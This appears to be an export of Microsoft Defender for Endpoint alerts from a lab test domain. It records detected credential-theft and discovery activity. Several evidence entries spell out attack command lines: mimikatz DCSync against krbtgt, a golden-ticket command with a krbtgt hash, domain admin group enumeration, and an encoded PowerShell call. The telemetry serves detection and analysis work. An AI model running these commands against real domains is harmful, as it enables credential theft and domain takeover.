"2022-11-21T02:25:51.6133333Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" group \"Enterprise Admins\" /domain", "processCreationTime": "2022-11-21T02:24:17.1250322Z", "processId": 2256, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:25:51.76Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" user ronhd /domain", "processCreationTime": "2022-11-21T02:24:17.5212335Z", "processId": 9092, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:32:44.6633333Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" user /domain", "processCreationTime": "2022-11-21T02:30:51.6916292Z", "processId": 11588, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:32:44.7766667Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" group /domain", "processCreationTime": "2022-11-21T02:30:51.8017458Z", "processId": 9404, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:32:44.9766667Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" group \"Domain Admins\" /domain", "processCreationTime": "2022-11-21T02:30:51.8486166Z", "processId": 2256, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:32:44.9966667Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" group \"Enterprise Admins\" /domain", "processCreationTime": "2022-11-21T02:30:51.9043359Z", "processId": 7716, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:32:45.13Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" user ronhd /domain", "processCreationTime": "2022-11-21T02:30:52.2998431Z", "processId": 728, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:34:57.84Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" user /domain", "processCreationTime": "2022-11-21T02:32:52.7031282Z", "processId": 6960, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:34:58.2Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" group /domain", "processCreationTime": "2022-11-21T02:32:52.7764923Z", "processId": 11008, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-28T09:51:39.7666667Z
Suspicious
None
darol
vpn.zone
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T13:52:14.0366667Z
Benign
None
darol
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-21T02:04:26.1266667Z
Benign
None
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
9,780
"mimikatz.exe" "lsadump::dcsync /domain:msdxv2.m365dpoc.com /user:krbtgt" exit
2022-11-21T02:02:27.1310359Z
11,068
2022-11-21T02:01:28.4753286Z
powershell.exe
\Device\HarddiskVolume4\Windows\System32\WindowsPowerShell\v1.0
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-18T04:50:04.1566667Z
Suspicious
Active
Takeshi
TMTOWER-BOOK
S-1-5-21-7316772-2057538409-3008203053-1001
null
null
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
20,656
ping 127.0.0.1
2022-11-18T04:48:53.8781061Z
14,616
2022-11-14T04:36:16.5242809Z
powershell.exe
\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0
Detected
83b06aa80899050e5d4132992e36b5b8f14b64e9
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-11T08:19:39.1366667Z
Suspicious
None
bob
MSDXV2
S-1-5-21-2300221942-1987151257-321556088-1111
89b6fc86-af84-47b2-a72d-325362598b2c
ronhd@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-09-30T06:14:46.0833333Z
Suspicious
None
jeff
corp.local
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-09-30T06:15:59.5333333Z
Suspicious
None
steve
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1107
0808dea1-2ec8-41d2-8e3e-7c18309fab09
steve@msdxv2.m365dpoc.com
ded8fd7f36417f66eb6ada10e0c0d7c0022986e9
bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527
cmd.exe
C:\Windows\System32
3,132
whoami /all
2022-09-30T06:13:29.1932614Z
7,308
2022-09-30T06:13:28.5321636Z
PSEXESVC.exe
C:\Windows
Detected
e138ecd8e7b21eaf952cb35d56349bf50c64ac96
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-09-30T06:24:37.89Z
Suspicious
None
alice
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1111
89b6fc86-af84-47b2-a72d-325362598b2c
ronhd@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-09-30T06:15:08.9233333Z
Suspicious
None
hacker
MSDXV2
S-1-5-18
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638072963026499465_1469012925
8c0c6243-34ce-45ce-a756-bfdc837ffa12
975
MicrosoftDefenderForEndpoint
2022-12-22T08:58:22.6499651Z
2022-12-22T09:30:09.02Z
null
2022-12-22T08:47:29.6780551Z
2022-12-22T09:28:41.7266951Z
File dropped and launched from remote location
A remote session dropped a file and executed it. An attacker or a malware might be an attempting move laterally or propagate.
LateralMovement
New
Medium
62
PendingApproval
null
null
WindowsDefenderAtp
17d50613-c135-4981-858e-86cdecb4e46e
null
null
null
[ "T1021.002", "T1105", "T1570" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "internal.corp", "firstSeen": "2022-12-08T01:04:21.9057174Z", "healthStatus": "Active", "loggedOnUsers": [], "mdatpDeviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15", "onboardingStatus": "Onboarded", "osBuild": 19043, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "High", "tags": [], "version": "21H1", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV8/providers/Microsoft.Compute/virtualMachines/MSDXV8-Win10B", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "97e5e58b-3d5e-4bfe-8e40-a88b49deff08" } } ]
[ { "aadUserId": null, "accountName": "ronhd", "detectionStatus": null, "deviceId": null, "domainName": "MSDXV8", "entityType": "User", "evidenceCreationTime": "2022-12-22T08:58:22.77Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": "S-1-5-21-2159906967-4174806019-1002223092-1111", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "User", "evidenceCreationTime": "2022-12-22T08:58:22.77Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": "S-1-0-0", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-12-22T08:58:22.77Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "NotFound", "remediationStatusDetails": "The system cannot find the file specified.,The system cannot find the file specified.", "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Ip", "evidenceCreationTime": "2022-12-22T08:58:22.77Z", "fileName": null, "filePath": null, "ipAddress": "10.0.0.9", "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-12-22T08:58:22.77Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-12-22T08:38:52.5569028Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 748, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-12-22T08:47:50.8661147Z", "processId": 4216, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-12-22T08:58:22.77Z", "fileName": "ntoskrnl.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": "2022-12-22T08:38:47.8970101Z", "processId": 4, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f83368154fce0f4e8f9d6fe000ef522fbb3884b7", "sha256": "7e4a848626c99c715bd2c8686061420b8895e12ab8dfa0cce091f9df25750c13", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-12-22T09:30:08.7566667Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-12-22T08:54:09.1992899Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 716, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-12-22T09:28:41.326336Z", "processId": 6356, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-12-22T09:30:09.01Z", "fileName": "ntoskrnl.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": "2022-12-22T08:54:03.8865956Z", "processId": 4, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "e502daf3827521dcc443e1f60c50adcee3278e2d", "sha256": "bc4b64553cd9b81e2fd5e382fd4024d4eacc04417682c02b468900ea79883238", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-09-30T05:36:50.2133333Z
Suspicious
None
jeff
null
S-1-5-21-2300221942-1987151257-321556088-1104
null
null
6cbce4a295c163791b60fc23d285e6d84f28ee4c
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
powershell.exe
7,068
powershell -enc ZABpAHIA
2022-09-30T05:06:43.3390523Z
7,116
2022-09-30T05:06:43.3100364Z
null
null
null
null
da638001152874467378_-523357944
fd933a37-d34a-47b5-9601-bc90c711b665
486
MicrosoftDefenderForEndpoint
2022-09-30T06:14:47.4467617Z
2022-11-19T01:35:42.7033333Z
2022-10-01T01:36:00.5066667Z
2022-09-30T06:13:09.3768584Z
2022-09-30T06:13:09.3768584Z
Malicious credential theft tool execution detected
A known credential theft tool execution command line was detected. Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more.
CredentialAccess
Resolved
High
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
f5d3c5d8-ec3a-4412-ab45-934d8faff42c
msftadmin@msdxv2.m365dpoc.com
null
null
[ "T1003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "Medium", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-09-30T06:14:47.4866667Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-09-30T06:14:47.4866667Z", "fileName": "ticket.kirbi", "filePath": "C:\\M365DAttack\\Admin-Tickets", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "620f1111327039366b6d83d7b76638945d191350", "sha256": "46f289f8920970813e6c9dd0c5e2ae33494940d0ed896d705d1c7e2a36208a0e", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-09-30T06:14:47.4866667Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-09-30T06:11:13.210308Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4064, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"kerberos::golden /domain:msdxv2.m365dpoc.com /sid:S-1-5-21-1296854425-3029985372-4181197820 /krbtgt:334c5cf2bab300e3e456e328f5c699d3 /user:Steve /ticket:C:\\M365DAttack\\Admin-Tickets\\ticket.kirbi /ptt\" exit", "processCreationTime": "2022-09-30T06:13:06.97219Z", "processId": 6036, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-09-30T06:14:47.4866667Z", "fileName": "powershell.exe", "filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "ipAddress": null, "parentProcessCreationTime": "2022-08-23T12:17:37.8693453Z", "parentProcessFileName": "explorer.exe", "parentProcessFilePath": "C:\\Windows", "parentProcessId": 4668, "processCommandLine": "\"powershell.exe\" ", "processCreationTime": "2022-09-30T06:11:13.210308Z", "processId": 4064, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c", "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638072982338943427_-1580473485
7379170f-b931-4672-a587-cf403d000f48
975
MicrosoftDefenderForEndpoint
2022-12-22T09:30:33.8943652Z
2022-12-22T09:30:34.6133333Z
null
2022-12-22T09:26:29.7350033Z
2022-12-22T09:26:43.0697905Z
Suspicious System Service Discovery
A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks.
Discovery
New
Low
null
UnsupportedAlertType
null
null
WindowsDefenderAtp
9bfe28a9-21eb-4f8a-b51e-38ebd3650c88
null
null
null
[ "T1007", "T1059.001" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "evilcorp.cn", "firstSeen": "2022-12-08T05:21:19.944Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV8" } ], "mdatpDeviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "High", "tags": [], "version": "1809", "vmMetadata": null } ]
